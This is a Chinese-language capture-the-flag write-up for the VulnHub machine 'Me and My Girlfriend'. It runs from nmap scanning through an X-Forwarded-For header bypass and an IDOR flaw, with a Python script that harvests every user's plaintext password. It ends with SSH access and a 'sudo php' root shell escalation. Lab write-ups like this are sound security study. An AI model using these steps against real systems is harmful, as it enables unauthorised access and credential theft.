攻击机:kali linux
目标靶机:me and my girlfriend(可在vulnhub中搜索下载)
emmm,大概意思就是Alice存了些秘密,Bob请我们帮他找出来……
目录
壹 信息收集
one 查看kali IP地址
two 主机发现
用nmap获取目标主机IP地址
nmap -sn 192.168.74.0/24
目标主机IP地址为192.168.74.131
three 端口扫描
使用Nmap扫描端口详细信息
贰 渗透测试
one 浏览网站
?既然开了80端口,就看看网站是什么样子
?这。。。查看burpsuite里的包
two 设置xff头
提示需要设置xff头,重新访问一遍,用burpsuite给每一个包都加上xff头(之后的也需要这样),当然了,也可以使用插件,因为本来就需要查看包的内容,所以我就直接用burpsuite了
x-forwarded-for:127.0.0.1
登录框未发现sql注入,弱口令等漏洞,尝试注册一下,同时扫描一下目录
每次都在包里添加xff太麻烦,可以直接在burpsuite中设置
扫出的目录也没有发现什么
刚刚注册了一个用户,并尝试登录
点击profile,查看源代码,可以看到密码明文写在源码中
three 越权漏洞
尝试修改id数值,测试是否存在越权访问漏洞
猜测的不错,不如?写一个爬虫?权当复习。。。
import requests
from bs4 import BeautifulSoup
for id in range(1,13):
headers = {
'x-forwarded-for':'127.0.0.1',
'Cookie':'PHPSESSID=o5jbhb8k56mfb5kth7vpmpvfe1'
}
url = 'http://192.168.74.131/index.php?page=profile&user_id=' + str(id)
req = requests.get(url,headers = headers)
soup = BeautifulSoup(req.text,"html.parser")
name = soup.find('input',id = "username")['value']
passwd = soup.find('input',id = "password")['value']
print(name,passwd)?结果:
?four ssh连接
盲猜Alice是管理员,刚刚还有22端口运行着ssh服务,尝试连接
ssh alice@192.168.74.131
成功get shell
查看隐藏文件,.my_secret很惹人注意,打开查看获取到了flag1
?flag1
my_notes.txt
喜欢新搭档?这必须得告诉Bob
叁 提权?
sudo -l查看alice有什么权限,发现alice可以使用root权限运行php文件
使用php回调bash提权
sudo php -r 'system("/bin/bash");'
结束了,查看flag2
